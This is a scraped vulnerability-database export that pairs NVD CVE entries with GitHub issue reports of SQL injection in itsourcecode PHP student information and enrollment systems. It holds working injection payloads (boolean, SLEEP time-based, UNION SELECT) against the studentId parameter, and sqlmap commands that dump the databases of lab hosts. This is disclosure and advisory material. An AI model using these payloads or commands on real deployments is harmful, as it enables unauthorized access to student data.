"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266293"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266293"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344447"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266293"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266293"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344447"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:student_information_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EC83737B-EB58-46E4-B676-6F2B29894828",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Student Information Management System in PHP 1.0 view.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Student Information Management System in PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Lanxiy7th
## Vulnerable File
+ view.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2015/10/columbans.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'view.php' file of the 'Student Information Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "studentId" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
+ <img width="771" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/365e1c5f-148c-4402-9be2-0406aedb9933">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the PHP Student Information Management System, Lanxiy7th discovered a critical SQL injection vulnerability in the "view. php" file. This vulnerability stems from insufficient user input validation of the "studentId" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
+ UNION query
## Vulnerability location:
+ 'studentId' parameter
## Payload:
```sql
view=view&studentId=20004277 AND 5254=5254
view=view&studentId=20004277 AND (SELECT 4018 FROM (SELECT(SLEEP(5)))eHNw)
view=view&studentId=20004277 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a6a71,0x504c53717a6d734774675378794d566b745a5862626e4f75627344584353546d707971565056654a,0x716b6b7871),NULL,NULL,NULL,NULL,NULL-- -
```
```Parameter: studentId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: view=view&studentId=20004277 AND 5254=5254
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: view=view&studentId=20004277 AND (SELECT 4018 FROM (SELECT(SLEEP(5)))eHNw)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: view=view&studentId=20004277 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a6a71,0x504c53717a6d734774675378794d566b745a5862626e4f75627344584353546d707971565056654a,0x716b6b7871),NULL,NULL,NULL,NULL,NULL-- -
```
+ <img width="343" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/208d9ee7-2f93-47af-9f30-91f8f8ebd399">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.144.199:1215/columbans/admin/modules/class/index.php?view=class&classId=7" --batch --level 5 --dbs
```
+ <img width="318" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/ff290383-1b67-47c7-acbf-a9030a774c06">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Student Information Management System in PHP 1.0 view.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/2/comments | 0 | 2024-05-25T08:52:02Z | 2024-05-25T08:52:02Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/2 | 2,316,847,327 | 2 | 6,033 |
CVE-2024-5390 | 2024-05-27T01:15:20.410 | A vulnerability, which was classified as critical, was found in itsourcecode Online Student Enrollment System 1.0. Affected is an unknown function of the file listofstudent.php. The manipulation of the argument lname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266304. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266304"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266304"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344603"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266304"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266304"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344603"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Online Student Enrollment System Project In PHP listofstudent.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Student Enrollment System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Lanxiy7th
## Vulnerable File
+ listofstudent.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'listofstudent.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "lname" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="676" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/092aad2a-a253-436b-bac7-7c11bd9fdfc5">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "listofstudent.php" file. This vulnerability stems from insufficient user input validation of the "lname" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
+ UNION query
## Vulnerability location:
+ 'lname' parameter
## Payload:
<img width="313" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/30c55af8-5cdc-4096-a846-51f9cf7299ea">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.144.199:1217/kccreg/listofstudent.php?lname=1231&fname=123&idno=123" --batch --level 5 --dbs
```
<img width="312" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/745fd73b-6490-4690-8e75-ba50da77ccb1">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online Student Enrollment System Project In PHP listofstudent.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/3/comments | 0 | 2024-05-26T03:19:39Z | 2024-05-26T03:19:40Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/3 | 2,317,412,593 | 3 | 6,034 |
CVE-2024-5391 | 2024-05-27T01:15:20.693 | A vulnerability has been found in itsourcecode Online Student Enrollment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file listofsubject.php. The manipulation of the argument subjcode leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266305 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266305"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266305"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344605"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266305"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266305"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344605"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Online Student Enrollment System Project In PHP listofsubject.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Student Enrollment System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Lanxiy7th
## Vulnerable File
+ listofsubject.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'listofsubject.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "subjcode" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="799" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/2eb7197a-1d04-45e5-882d-ffd73471cef5">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "listofsubject.php" file. This vulnerability stems from insufficient user input validation of the "subjcode" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
## Vulnerability location:
+ 'subjcode' parameter
## Payload:
<img width="322" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/36cab2f7-5d97-48e0-bcad-573e659edd62">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.144.199:1217/kccreg/listofsubject.php?subjcode=123&course=19&semester=123&ay=123" --batch --level 5 --dbs
```
<img width="318" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/57b90a71-2b6b-4b88-917a-ef8f12fd68db">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online Student Enrollment System Project In PHP listofsubject.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/4/comments | 0 | 2024-05-26T03:31:54Z | 2024-05-26T05:03:24Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/4 | 2,317,416,662 | 4 | 6,035 |
CVE-2024-5392 | 2024-05-27T02:15:08.933 | A vulnerability was found in itsourcecode Online Student Enrollment System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file editSubject.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-266306 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
